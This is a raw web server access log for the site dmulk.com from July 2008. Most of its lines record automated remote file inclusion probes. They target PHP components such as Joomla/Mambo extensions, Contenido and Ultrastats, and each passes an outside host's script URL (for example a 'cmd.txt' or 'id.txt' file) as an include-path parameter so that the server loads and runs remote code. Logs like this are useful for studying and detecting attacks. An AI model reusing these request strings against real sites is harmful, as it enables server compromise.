211.233.15.53 - - [24/Jul/2008:06:44:00 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:02 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 200 18505 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:03 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:16 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:18 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 200 18505 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:19 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:44:27 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:44:27 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:32 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:06:44:40 -0700] "GET /logs/access.log//include/write.php?dir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:44:40 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:44:40 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.15.53 - - [24/Jul/2008:06:44:41 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:44:49 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:44:49 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:45:02 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:45:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.48.146 - - [24/Jul/2008:06:45:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.48.146 - - [24/Jul/2008:06:45:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:06:45:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:06:45:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:06:45:59 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:46:01 -0700] "GET /logs/access_080322.log/modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:46:02 -0700] "GET /modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:06:46:02 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [24/Jul/2008:06:46:02 -0700] "GET /logs/modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:46:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:46:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:46:08 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:46:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:46:12 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:46:12 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:46:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:06:46:20 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [24/Jul/2008:06:46:52 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:06:47:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0016.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:47:40 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:47:40 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.212.130.170 - - [24/Jul/2008:06:47:45 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
62.212.130.170 - - [24/Jul/2008:06:47:45 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.6.22.88 - - [24/Jul/2008:06:47:46 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.0" 200 11510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:47:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:47:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:47:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:47:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:48:56 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:48:56 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:06:49:07 -0700] "GET /logs/access.log/index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:06:49:12 -0700] "GET /index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.187.90 - - [24/Jul/2008:06:49:13 -0700] "GET /logs/index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.60.155.3 - - [24/Jul/2008:06:49:16 -0700] "GET /modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
211.60.155.3 - - [24/Jul/2008:06:49:16 -0700] "GET /logs/modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:49:19 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:49:23 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18519 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:49:57 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:49:57 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.68.3.10 - - [24/Jul/2008:06:50:14 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.68.3.10 - - [24/Jul/2008:06:50:19 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.188.173.24 - - [24/Jul/2008:06:50:20 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
208.68.3.10 - - [24/Jul/2008:06:50:21 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 200 18501 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.178 - - [24/Jul/2008:06:50:24 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 54285 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:50:40 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [24/Jul/2008:06:50:43 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:50:44 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.805" "www.dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:50:50 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:51:11 -0700] "GET /logs/access_080315.log//skin/zero_vote/ask_password.php?dir=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.19.87.218 - - [24/Jul/2008:06:51:11 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
81.0.228.184 - - [24/Jul/2008:06:51:15 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:51:25 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:51:25 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:51:25 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:06:51:29 -0700] "GET /bikes/dteel/2008_02_07/?S=D HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.125 - - [24/Jul/2008:06:51:50 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.125 - - [24/Jul/2008:06:51:55 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:51:56 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:06:51:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:52:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:52:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.45.177.194 - - [24/Jul/2008:06:52:34 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:52:47 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:52:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:53:15 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:53:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:06:53:52 -0700] "GET /logs/access_080329.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:06:53:52 -0700] "GET //administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:06:53:52 -0700] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:06:53:52 -0700] "GET /logs/access_080315.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:54:17 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:54:17 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:54:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:54:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:06:54:47 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:06:54:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:06:54:48 -0700] "GET //index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 200 18463 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:06:55:04 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET /logs/access_080207.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET /logs/access_080207.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:06:55:19 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:06:55:30 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:06:55:30 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:06:55:31 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:55:56 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:55:56 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:06:56:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:06:56:13 -0700] "GET /phphtml.php?htmlclass_path=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:56:15 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:56:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
